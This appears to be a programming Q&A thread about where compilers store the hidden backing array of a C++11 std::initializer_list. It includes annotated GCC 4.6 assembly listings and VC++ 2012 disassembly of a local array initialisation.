Would each of the compilers mentioned above store the backing array of the uniform initialisation in the same memory as a variable declared static const? And would each of the compilers initialise the backing array when the function is called, or at application initialisation? (I'm not talking about the std::initializer_list<std::string> that would be created, but rather the "hidden array" it refers to.)
This is my attempt to answer my own question for at least GCC. My understanding of the assembler output of gcc is not fantastic, so please correct as necessary.
Using initializer_test.cpp:
#include <vector>
int main()
{
std::vector<long> values = { 123456, 123457, 123458 };
return 0;
}
And compiling using gcc v4.6.3 using the following command line:
g++ -Wa,-adhln -g initializer_test.cpp -masm=intel -std=c++0x -fverbose-asm | c++filt | view -
I get the following output (cut down to the hopefully relevant bits):
5:initializer_test.cpp **** std::vector<long> values = { 123456, 123457, 123458 };
100 .loc 2 5 0
101 0009 488D45EF lea rax, [rbp-17] # tmp62,
102 000d 4889C7 mov rdi, rax #, tmp62
103 .cfi_offset 3, -24
104 0010 E8000000 call std::allocator<long>::allocator() #
104 00
105 0015 488D45D0 lea rax, [rbp-48] # tmp63,
106 0019 BA030000 mov edx, 3 #, <-- Parameter 3
106 00
107 001e BE000000 mov esi, OFFSET FLAT:._42 #, <-- Parameter 2
107 00
108 0023 4889C7 mov rdi, rax #, tmp63 <-- Parameter 1
109 0026 E8000000 call std::initializer_list<long>::initializer_list(long const*, unsigned long) #
109 00
110 002b 488D4DEF lea rcx, [rbp-17] # tmp64,
111 002f 488B75D0 mov rsi, QWORD PTR [rbp-48] # tmp65, D.10602
112 0033 488B55D8 mov rdx, QWORD PTR [rbp-40] # tmp66, D.10602
113 0037 488D45B0 lea rax, [rbp-80] # tmp67,
114 003b 4889C7 mov rdi, rax #, tmp67
115 .LEHB0:
116 003e E8000000 call std::vector<long, std::allocator<long> >::vector(std::initializer_list<long>, std::allocator<long> const&) #
116 00
117 .LEHE0:
118 .loc 2 5 0 is_stmt 0 discriminator 1
119 0043 488D45EF lea rax, [rbp-17] # tmp68,
120 0047 4889C7 mov rdi, rax #, tmp68
121 004a E8000000 call std::allocator<long>::~allocator() #
and
1678 .section .rodata
1679 0002 00000000 .align 16
1679 00000000
1679 00000000
1679 0000
1682 ._42:
1683 0010 40E20100 .quad 123456
1683 00000000
1684 0018 41E20100 .quad 123457
1684 00000000
1685 0020 42E20100 .quad 123458
1685 00000000
Now if I'm understanding the call on line 109 correctly in the context of x86-64 System V AMD64 ABI calling convention (the parameters I've annotated to the code listing), this is showing that the backing array is being stored in .rodata, which I am taking to be the same memory as static const data. At least for gcc 4.6 anyway.
Performing a similar test but with optimisations turned on (-O2), it seems the initializer_list is optimised out:
70 .file 2 "/usr/include/c++/4.6/ext/new_allocator.h"
71 .loc 2 92 0
72 0004 BF180000 mov edi, 24 #,
72 00
73 0009 E8000000 call operator new(unsigned long) #
73 00
74 .LVL1:
75 .file 3 "/usr/include/c++/4.6/bits/stl_algobase.h"
76 .loc 3 366 0
77 000e 488B1500 mov rdx, QWORD PTR ._42[rip] # ._42, ._42
77 000000
90 .file 4 "/usr/include/c++/4.6/bits/stl_vector.h"
91 .loc 4 155 0
92 0015 4885C0 test rax, rax # D.11805
105 .loc 3 366 0
106 0018 488910 mov QWORD PTR [rax], rdx #* D.11805, ._42
107 001b 488B1500 mov rdx, QWORD PTR ._42[rip+8] # ._42, ._42
107 000000
108 0022 48895008 mov QWORD PTR [rax+8], rdx #, ._42
109 0026 488B1500 mov rdx, QWORD PTR ._42[rip+16] # ._42, ._42
109 000000
110 002d 48895010 mov QWORD PTR [rax+16], rdx #, ._42
124 .loc 4 155 0
125 0031 7408 je .L8 #,
126 .LVL3:
127 .LBB342:
128 .LBB343:
129 .loc 2 98 0
130 0033 4889C7 mov rdi, rax #, D.11805
131 0036 E8000000 call operator delete(void*) #
All in all, std::initializer_list is looking pretty optimal in gcc.
First of all: VC++, as of VS11 = VS2012 in its initial release, does not support initializer lists, so the question is a bit moot for VS at the moment, but as I'm sure they'll patch this up, it should become relevant in a few months (or years).
As additional info, I'll add what VS 2012 does with local array initialization; everybody may draw their own conclusions as to what that means for when they'll implement initializer lists:
Here's what VC++ 2012 spits out for initialization of built-in arrays in its default release mode:
int _tmain(int argc, _TCHAR* argv[])
{
00B91002 in al,dx
00B91003 sub esp,28h
00B91006 mov eax,dword ptr ds:[00B94018h]
00B9100B xor eax,ebp
00B9100D mov dword ptr [ebp-4],eax
00B91010 push esi
int numbers[] = {1,2,3,4,5,6,7,8,9};
00B91011 mov dword ptr [numbers],1
00B91018 mov dword ptr [ebp-24h],2
00B9101F mov dword ptr [ebp-20h],3
00B91026 mov dword ptr [ebp-1Ch],4
00B9102D mov dword ptr [ebp-18h],5
00B91034 mov dword ptr [ebp-14h],6
00B9103B mov dword ptr [ebp-10h],7
00B91042 mov dword ptr [ebp-0Ch],8
00B91049 mov dword ptr [ebp-8],9
...
So this array is created/filled at function execution, no "static" storage involved as such.